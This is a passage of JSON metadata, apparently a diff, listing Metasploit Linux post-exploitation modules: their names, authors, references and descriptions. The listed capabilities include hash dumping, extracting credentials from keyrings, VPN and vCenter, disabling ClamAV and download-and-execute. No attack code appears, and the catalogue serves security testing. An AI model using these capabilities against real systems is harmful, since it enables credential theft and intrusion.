This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen,\n Bhyve and QEMU/KVM.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/checkvm.rb", - "is_install_path": true, - "ref_name": "linux/gather/checkvm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/ecryptfs_creds": { - "name": "Gather eCryptfs Metadata", - "fullname": "post/linux/gather/ecryptfs_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Dhiru Kholia " - ], - "description": "This module will collect the contents of all users' .ecrypts directories on\n the targeted machine. 
Collected \"wrapped-passphrase\" files can be\n cracked with John the Ripper (JtR) to recover \"mount passphrases\".", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/ecryptfs_creds.rb", - "is_install_path": true, - "ref_name": "linux/gather/ecryptfs_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_commands": { - "name": "Gather Available Shell Commands", - "fullname": "post/linux/gather/enum_commands", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Rafael Rodriguez Iglesias " - ], - "description": "This module will check which shell commands are available on a system.\"", - "references": [], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-12-20 23:42:51 +0000", - "path": "/modules/post/linux/gather/enum_commands.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_commands", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_configs": { - "name": "Linux Gather Configurations", - "fullname": "post/linux/gather/enum_configs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ohdae " - ], - "description": "This module collects configuration files found on commonly installed\n applications and services, 
such as Apache, MySQL, Samba, Sendmail, etc.\n If a config file is found in its default path, the module will assume\n that is the file we want.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_configs.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_configs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_containers": { - "name": "Linux Container Enumeration", - "fullname": "post/linux/gather/enum_containers", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "stealthcopter" - ], - "description": "This module attempts to enumerate containers on the target machine and optionally run a command on each active container found.\n Currently it supports Docker, LXC and RKT.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/linux/gather/enum_containers.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_containers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_nagios_xi": { - "name": "Nagios XI Enumeration", - "fullname": "post/linux/gather/enum_nagios_xi", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-04-17", - "type": "post", - 
"author": [ - "Cale Smith" - ], - "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n creating opportunities for lateral movement.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_nagios_xi.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_nagios_xi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "post_linux/gather/enum_network": { - "name": "Linux Gather Network Information", - "fullname": "post/linux/gather/enum_network", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ohdae ", - "Stephen Haywood " - ], - "description": "This module gathers network information from the target system\n IPTables rules, interfaces, wireless information, open and listening\n ports, active network connections, DNS information and SSH information.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_network.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_network", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_protections": { - "name": "Linux Gather Protection Enumeration", - "fullname": 
"post/linux/gather/enum_protections", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ohdae " - ], - "description": "This module checks whether popular system hardening mechanisms are\n in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n tries to find installed applications that can be used to hinder,\n prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n This module is meant to identify Linux Secure Modules (LSM) in addition\n to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n related software.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 23:10:40 +0000", - "path": "/modules/post/linux/gather/enum_protections.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_protections", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_psk": { - "name": "Linux Gather NetworkManager 802-11-Wireless-Security Credentials", - "fullname": "post/linux/gather/enum_psk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Cenk Kalpakoglu" - ], - "description": "This module collects 802-11-Wireless-Security credentials such as\n Access-Point name and Pre-Shared-Key from Linux NetworkManager\n connection configuration files.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-21 00:28:34 +0000", - "path": "/modules/post/linux/gather/enum_psk.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_psk", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_system": { - "name": "Linux Gather System and User Information", - "fullname": "post/linux/gather/enum_system", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Stephen Haywood ", - "sinn3r ", - "ohdae ", - "Roberto Espreto " - ], - "description": "This module gathers system information. We collect\n installed packages, installed services, mount information,\n user list, user bash history and cron jobs", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_system.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_system", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_users_history": { - "name": "Linux Gather User History", - "fullname": "post/linux/gather/enum_users_history", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ohdae " - ], - "description": "This module gathers the following user-specific information:\n shell history, MySQL history, PostgreSQL history, MongoDB history,\n Vim history, lastlog, and sudoers.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": 
"/modules/post/linux/gather/enum_users_history.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_users_history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/f5_loot_mcp": { - "name": "F5 Big-IP Gather Information from MCP Datastore", - "fullname": "post/linux/gather/f5_loot_mcp", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-11-16", - "type": "post", - "author": [ - "Ron Bowes" - ], - "description": "This module gathers various interesting pieces of data from F5's\n \"mcp\" datastore, which is accessed via /var/run/mcp using a\n proprietary protocol.\n\n Adapted from: https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb", - "references": [ - "URL-https://github.com/rbowes-r7/refreshing-mcp-tool", - "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/", - "URL-https://support.f5.com/csp/article/K97843387" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/linux/gather/f5_loot_mcp.rb", - "is_install_path": true, - "ref_name": "linux/gather/f5_loot_mcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/gnome_commander_creds": { - "name": "Linux Gather Gnome-Commander Creds", - "fullname": "post/linux/gather/gnome_commander_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 
"post", - "author": [ - "David Bloom" - ], - "description": "This module collects the clear text passwords stored by\n Gnome-commander, a GUI file explorer for GNOME. Typically, these\n passwords are stored in the user's home directory, at\n ~/.gnome-commander/connections.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/gnome_commander_creds.rb", - "is_install_path": true, - "ref_name": "linux/gather/gnome_commander_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/gnome_keyring_dump": { - "name": "Gnome-Keyring Dump", - "fullname": "post/linux/gather/gnome_keyring_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Spencer McIntyre" - ], - "description": "Use libgnome-keyring to extract network passwords for the current user.\n This module does not require root privileges to run.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/gnome_keyring_dump.rb", - "is_install_path": true, - "ref_name": "linux/gather/gnome_keyring_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/haserl_read": { - "name": "Haserl Arbitrary File Reader", - "fullname": "post/linux/gather/haserl_read", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Julien (jvoisin) Voisin", - "Ike Broflovski" - ], - "description": "This module exploits haserl prior to 0.9.36 to read arbitrary files.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.", - "references": [ - "URL-https://twitter.com/steaIth/status/1364940271054712842", - "URL-https://gitlab.alpinelinux.org/alpine/aports/-/issues/12539", - "CVE-2021-29133" - ], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/linux/gather/haserl_read.rb", - "is_install_path": true, - "ref_name": "linux/gather/haserl_read", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/hashdump": { - "name": "Linux Gather Dump Password Hashes for Linux Systems", - "fullname": "post/linux/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Post Module to dump the password hashes for all users on a Linux System", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "linux/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - 
"needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/manageengine_password_manager_creds": { - "name": "Linux Gather ManageEngine Password Manager Pro Password Extractor", - "fullname": "post/linux/gather/manageengine_password_manager_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Travis Kaun", - "Rob Simon", - "Charles Yost", - "Christophe De La Fuente" - ], - "description": "This module gathers the encrypted passwords stored by Password Manager\n Pro and decrypt them using key materials stored in multiple\n configuration files.", - "references": [ - "URL-https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/", - "URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-02 14:03:15 +0000", - "path": "/modules/post/linux/gather/manageengine_password_manager_creds.rb", - "is_install_path": true, - "ref_name": "linux/gather/manageengine_password_manager_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/mimipenguin": { - "name": "MimiPenguin", - "fullname": "post/linux/gather/mimipenguin", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-05-23", - "type": "post", - "author": [ - "huntergregal", - "bcoles ", - "Shelby Pace" - ], - "description": "This searches process memory for needles that indicate\n where cleartext passwords may be located. 
If any needles\n are discovered in the target process memory, collected\n strings in adjacent memory will be hashed and compared\n with password hashes found in `/etc/shadow`.", - "references": [ - "URL-https://github.com/huntergregal/mimipenguin", - "URL-https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1772919", - "URL-https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490", - "CVE-2018-20781" - ], - "platform": "Linux", - "arch": "x86, x64, aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/linux/gather/mimipenguin.rb", - "is_install_path": true, - "ref_name": "linux/gather/mimipenguin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/mount_cifs_creds": { - "name": "Linux Gather Saved mount.cifs/mount.smbfs Credentials", - "fullname": "post/linux/gather/mount_cifs_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/mount_cifs_creds.rb", - "is_install_path": true, - "ref_name": "linux/gather/mount_cifs_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"post_linux/gather/openvpn_credentials": { - "name": "OpenVPN Gather Credentials", - "fullname": "post/linux/gather/openvpn_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "rvrsh3ll", - "Roberto Soares Espreto " - ], - "description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.", - "references": [ - "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh" - ], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/openvpn_credentials.rb", - "is_install_path": true, - "ref_name": "linux/gather/openvpn_credentials", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/phpmyadmin_credsteal": { - "name": "Phpmyadmin credentials stealer", - "fullname": "post/linux/gather/phpmyadmin_credsteal", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Chaitanya Haritash [bofheaded]", - "Dhiraj Mishra " - ], - "description": "This module gathers Phpmyadmin creds from target linux machine.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb", - "is_install_path": true, - "ref_name": "linux/gather/phpmyadmin_credsteal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - 
"Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/pptpd_chap_secrets": { - "name": "Linux Gather PPTP VPN chap-secrets Credentials", - "fullname": "post/linux/gather/pptpd_chap_secrets", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module collects PPTP VPN information such as client, server, password,\n and IP from your target server's chap-secrets file.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/pptpd_chap_secrets.rb", - "is_install_path": true, - "ref_name": "linux/gather/pptpd_chap_secrets", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/puppet": { - "name": "Puppet Config Gather", - "fullname": "post/linux/gather/puppet", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module will grab Puppet config files, credentials, host information, and file buckets.", - "references": [ - "URL-https://github.com/Tikam02/DevOps-Guide/blob/master/Infrastructure-provisioning/Puppet/puppet-commands.md" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/puppet.rb", - "is_install_path": true, - "ref_name": "linux/gather/puppet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" 
- ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/rancher_audit_log_leak": { - "name": "Rancher Audit Log Sensitive Information Leak", - "fullname": "post/linux/gather/rancher_audit_log_leak", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-02-08", - "type": "post", - "author": [ - "h00die" - ], - "description": "Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive\n contain a vulnerability where sensitive data is leaked into the audit logs.\n Rancher Audit Logging is an opt-in feature, only deployments that have it\n enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.\n\n Tested against rancher 2.6.0.", - "references": [ - "URL-https://github.com/rancher/rancher/security/advisories/GHSA-xfj7-qf8w-2gcr", - "URL-https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options", - "CVE-2023-22649" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/linux/gather/rancher_audit_log_leak.rb", - "is_install_path": true, - "ref_name": "linux/gather/rancher_audit_log_leak", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/tor_hiddenservices": { - "name": "Linux Gather TOR Hidden Services", - "fullname": "post/linux/gather/tor_hiddenservices", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Harvey Phillips " - ], - "description": "This module collects the hostnames name and private keys of\n any TOR Hidden Services 
running on the target machine. It\n will search for torrc and if found, will parse it for the\n directories of Hidden Services. However, root permissions\n are required to read them as they are owned by the user that\n TOR runs as, usually a separate account.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/tor_hiddenservices.rb", - "is_install_path": true, - "ref_name": "linux/gather/tor_hiddenservices", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/vcenter_secrets_dump": { - "name": "VMware vCenter Secrets Dump", - "fullname": "post/linux/gather/vcenter_secrets_dump", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-04-15", - "type": "post", - "author": [ - "npm ", - "Erik Wynter", - "h00die" - ], - "description": "Grab secrets and keys from the vCenter server and add them to\n loot. This module is tested against the vCenter appliance only;\n it will not work on Windows vCenter instances. It is intended to\n be run after successfully acquiring root access on a vCenter\n appliance and is useful for penetrating further into the\n environment following a vCenter exploit that results in a root\n shell.\n\n Secrets include the dcAccountDN and dcAccountPassword for\n the vCenter machine which can be used for maniuplating the SSO\n domain via standard LDAP interface; good for plugging into the\n vmware_vcenter_vmdir_ldap module or for adding new SSO admin\n users. 
The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with\n associated private keys are also plundered and can be used to\n sign forged SAML assertions for the /ui admin interface.", - "references": [ - "URL-https://github.com/shmilylty/vhost_password_decrypt", - "CVE-2022-22948", - "URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/", - "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-04-12 13:09:34 +0000", - "path": "/modules/post/linux/gather/vcenter_secrets_dump.rb", - "is_install_path": true, - "ref_name": "linux/gather/vcenter_secrets_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Dump", - "description": "Dump vCenter Secrets" - } - ] - }, - "post_linux/manage/adduser": { - "name": "Add a new user to the system", - "fullname": "post/linux/manage/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nick Cottrell " - ], - "description": "This command adds a new user to the system", - "references": [], - "platform": "AIX,BSD,Linux,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-10-25 19:28:23 +0000", - "path": "/modules/post/linux/manage/adduser.rb", - "is_install_path": true, - "ref_name": "linux/manage/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] 
- }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/disable_clamav": { - "name": "Disable ClamAV", - "fullname": "post/linux/manage/disable_clamav", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "DLL_Cool_J" - ], - "description": "This module will write to the ClamAV Unix socket to shutoff ClamAV.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/linux/manage/disable_clamav.rb", - "is_install_path": true, - "ref_name": "linux/manage/disable_clamav", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/dns_spoofing": { - "name": "Native DNS Spoofing module", - "fullname": "post/linux/manage/dns_spoofing", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Rafael Rodriguez Iglesias " - ], - "description": "This module will be applied on a session connected to a shell. 
It will redirect DNS Request to remote DNS server.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/manage/dns_spoofing.rb", - "is_install_path": true, - "ref_name": "linux/manage/dns_spoofing", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/download_exec": { - "name": "Linux Manage Download and Execute", - "fullname": "post/linux/manage/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua D. Abraham " - ], - "description": "This module downloads and runs a file with bash. It first tries to use curl as\n its HTTP client and then wget if it's not found. Bash found in the PATH is used\n to execute the file.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/manage/download_exec.rb", - "is_install_path": true, - "ref_name": "linux/manage/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/geutebruck_post_exp": { - "name": "Geutebruck Camera Deface", - "fullname": "post/linux/manage/geutebruck_post_exp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ibrahim Ayadhi", - "Sébastien Charbonnier" - ], - "description": "This module will take an existing session on a vulnerable Geutebruck 
